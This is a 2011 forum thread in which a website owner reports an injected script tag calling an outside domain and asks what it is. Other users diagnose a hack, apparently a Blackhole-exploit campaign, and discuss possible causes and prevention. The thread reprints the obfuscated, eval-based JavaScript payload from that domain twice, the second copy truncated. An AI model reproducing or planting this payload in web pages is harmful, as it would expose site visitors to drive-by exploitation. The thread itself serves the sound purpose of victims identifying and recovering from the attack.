April 7, 201115 yr hello, i didnt know where to post this but i thought in this section would be fairly suitable, anyway, i went to my website today and realised there was a error on the page and i said to myself thats strange it worked last time and i hadnt edited any scripts, well it was because a javascript line had been added to before the start session line, <script type="text/javascript" src="http://psa.krakow.pl/js.php"></script> thats what was inserted to the top of the script, does anyone know exactly what this is and why and where its from? Thanks, Gary
April 7, 201115 yr Author great, my login file has been emptied also "/ whether its to do with the insertion of the script i dont know, good job ive got a backup copy of it lol
April 7, 201115 yr Sorry to say you've been hacked - get in touch with your hosting company, let them know what has happened, they maybe able to restore your site (from their backup) prior to the hack
April 7, 201115 yr Author Sorry to say you've been hacked - get in touch with your hosting company, let them know what has happened, they maybe able to restore your site (from their backup) prior to the hack i seen a post from someone the other day with a similar thing, im sure the answer wasnt hacked, i remember seing it but not reading it in depth, why would someone hack someones site, to only remove 1 of the scripts in a totally random directory and then paste a javascript link on the top of my 2 index files? weird, although i do appreciate your help i will await further replies first Thanks, Gary
April 7, 201115 yr The reason why - I don't know and I don't want to investigate to find out what the script does ~ it probably redirects you to another site?
April 7, 201115 yr Author The reason why - I don't know and I don't want to investigate to find out what the script does ~ it probably redirects you to another site? it did nothing, it was js.php aswel so basicaly a php script in java tags but in the .php file it has a javascript saying var ar=" if (document.gElsByTaN'[0]{r;}v=\"pChw<:/x21>A,";</script><script>var ar2=[0,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,25,29,0,0,0,1,2,30,21,9,10,30,4,25,31,0,0,32,3,10,16,17,10,3,29,0,0,0,33,21,30,3,24,5,19,3,34,3,5,6,7,8,9,10,11,12,13,7,30,10,21,12,10,15,16,10,9,10,11,12,4,35,24,6,5,19,35,25,31,0,0,0,12,30,19,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,21,36,36,10,11,5,37,38,1,16,5,4,24,5,19,25,31,0,0,0,32,3,7,21,12,7,38,3,4,10,25,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,24,6,5,19,3,34,3,24,5,19,31,0,0,0,32,0,0,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,25,29,0,0,0,0,1,2,30,21,9,10,30,4,25,31,0,0,0,32,3,10,16,17,10,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,39,30,1,12,10,4,35,40,1,2,30,21,9,10,3,17,30,7,34,23,38,12,12,36,41,42,42,43,43,16,13,21,9,10,30,1,7,21,11,12,6,39,11,17,13,7,6,42,11,10,39,17,42,44,27,45,27,23,3,39,1,5,12,38,34,23,45,27,23,3,38,10,1,14,38,12,34,23,45,27,23,3,17,12,19,16,10,34,23,33,1,17,1,24,1,16,1,12,19,41,38,1,5,5,10,11,31,36,6,17,1,12,1,6,11,41,21,24,17,6,16,8,12,10,31,16,10,2,12,41,27,31,12,6,36,41,27,31,23,46,40,42,1,2,30,21,9,10,46,35,25,31,0,0,0,32,0,0,32,0,0,2,8,11,7,12,1,6,11,3,1,2,30,21,9,10,30,4,25,29,0,0,0,33,21,30,3,2,3,34,3,5,6,7,8,9,10,11,12,13,7,30,10,21,12,10,15,16,10,9,10,11,12,4,23,1,2,30,21,9,10,23,25,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,17,30,7,23,48,23,38,12,12,36,41,42,42,43,43,16,13,21,9,10,30,1,7,21,11,12,6,39,11,17,13,7,6,42,11,10,39,17,42,44,27,45,27,23,25,31,2,13,17,12,19,16,10,13,33,1,17,1,24,1,16,1,12,19,34,23,38,1,5,5,10,11,23,31,2,13,17,12,19,16,10,13,36,6,17,1,12,1,6,11,34,23,21,24,17,6,16,8,12,10,23,31,2,13,17,12,19,16,10,13,16,10,2,12,34,23,27,23,31,2,13,17,12,19,16,10,13,12,6,36,34,23,27,23,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,39,1,5,12,38,23,48,23,45,27,23,25,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,38,10,1,14,38,12,23,48,23,45,27,23,25,31,0,0,0,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,13,21,36,36,10,11,5,37,38,1,16,5,4,2,25,31,0,0,32];pau='val';e=new Function('','return e'+pau)();s="";for(i=0;i<ar2.length;i++){s+=ar[ar2];} e(s); this made no affect to my site in terms of redirection or anything, the site the javascript is from is saying "http://psa.krakow.pl/" which is a polish tradesman website like building and plumbing i had supposed :s
April 13, 201115 yr We too had this on a couple of our sites and the links to javascript php files were different domains on each page. How can this be prevented in the future?
April 13, 201115 yr Interesting - I tried to quote the OP and hit "preview post" adn my AVG blocked it and informed me there was the "Blackhole Exploit" threat. Must be AVG's interpretation of the post?
April 14, 201115 yr I can't remember what site this was posted on but a popular CMS has a weakness people are taking advantage on and putting javascript links on peoples websites. It sounds like this has happened to you, supposedly it hit thousands of websites. (it might not have even been a cms, i can't remember where the article was). And I read something about flash having weaknesses but I wont even try to pretend to know anything about that. Edited April 14, 201115 yr by PhilipMClifton
April 14, 201115 yr I reckon you've been hacked too. I always worry if a script finds its way onto pages, especially php so I just checked out that one at source-code-viewer[dot]com. (good site to read a pages source code without visiting the page). I didn't get what you were seeing (which might be the php in action) but saw a script adding style to the head. The use of eval is a worry though as it may have been dynamically writing an iframe and loading who knows what into into it. A popular hack from last year. Scripts that have strange urls (not associated with any cms you might be using) probably should be removed.
April 18, 201115 yr Author I can't remember what site this was posted on but a popular CMS has a weakness people are taking advantage on and putting javascript links on peoples websites. It sounds like this has happened to you, supposedly it hit thousands of websites. (it might not have even been a cms, i can't remember where the article was). And I read something about flash having weaknesses but I wont even try to pretend to know anything about that. i have heard of it being a break through on a CMS i think it was joomla loads of people had said they got it and they was using joomla, but that doesnt explain how it got on my websites because my websites are non CMS whatsoever, also flash is pretty secure, aslong as the PHP the flash is interacting with has its sanitisation on as usual its the same security level as PHP alone unless people know magic lol I reckon you've been hacked too. I always worry if a script finds its way onto pages, especially php so I just checked out that one at source-code-viewer[dot]com. (good site to read a pages source code without visiting the page). nah mate, i run 4/5 websites on different domain names, 2 different servers an they all had that script put at the top of index files, 2 of the 5 websites dont even have slightest use of php either, no input fields or anything so it wasnt sql injected, also one of my previous clients had it done on there website, and much more people had it done to them, whether it was the server hacked or not i dont know, dont have a clue what the scripts doing either haha **edit, saying that, looking at the script that was in the js.php file i think people do know magic haha ,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,25,29,0,0,0,1,2,30,21,9,10,30,4,25,31,0,0,32,3,10,16,17,10,3,29,0,0,0,33,21,30,3,24,5,19,3,34,3,5,6,7,8,9,10,11,12,13,7,30,10,21,12,10,15,16,10,9,10,11,12,4,35,24,6,5,19,35,25,31,0,0,0,12,30,19,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,21,36,36,10,11,5,37,38,1,16,5,4,24,5,19,25,31,0,0,0,32,3,7,21,12,7,38,3,4,10,25,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,24,6,5,19,3,34,3,24,5,19,31,0,0,0,32,0,0,0,1,2,3,4,5,6,7,8,9,10,11,12,9,16,10,13,16,10,2,12,34,23,27,23,31,2,13,17,12,19,16,10,13,12,6,36,34,23,27,23,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,39,1,5,12,38,23,48,23,45,27,23,25,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,38,10,1,14,38,12,23,48,23,45,27,23,25,31,0,0,0,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,13,21,36,36,10,11,5,37,38,1,16,5,4,2,25,31,0,0,32];pau='val';e=new Function('','return e'+pau)();s="";for(i=0;i<ar2.length;i++){s+=a Edited April 18, 201115 yr by web-itec
April 22, 201115 yr Author I've had this happen to me twice now. Getting cheesed off with it now. lol i got it twice on my main website, i just changed server password, updated filezilla and firefox incase it was somethin to do with that (doubt it) and virus scanned computer (before password change)
April 22, 201115 yr Author It's just frustrating. Seriously thinking of dithcing Joomla! may not be joomla mate on your behalf as i got the insert and im not using joomla
April 22, 201115 yr may not be joomla mate on your behalf as i got the insert and im not using joomla Hmm wonder what else it could be then. Most people I know who have had the problem were Joomla users.
May 13, 201115 yr Author Hmm wonder what else it could be then. Most people I know who have had the problem were Joomla users. hmm when i was targeted initially was the same time when my other sites were injected some how too, but on my main site when i remove alot of directories i had and made functions to prevent injection of any kind i didnt get it again but my other sites did that didnt have these functions.. hope it helps
Create an account or sign in to comment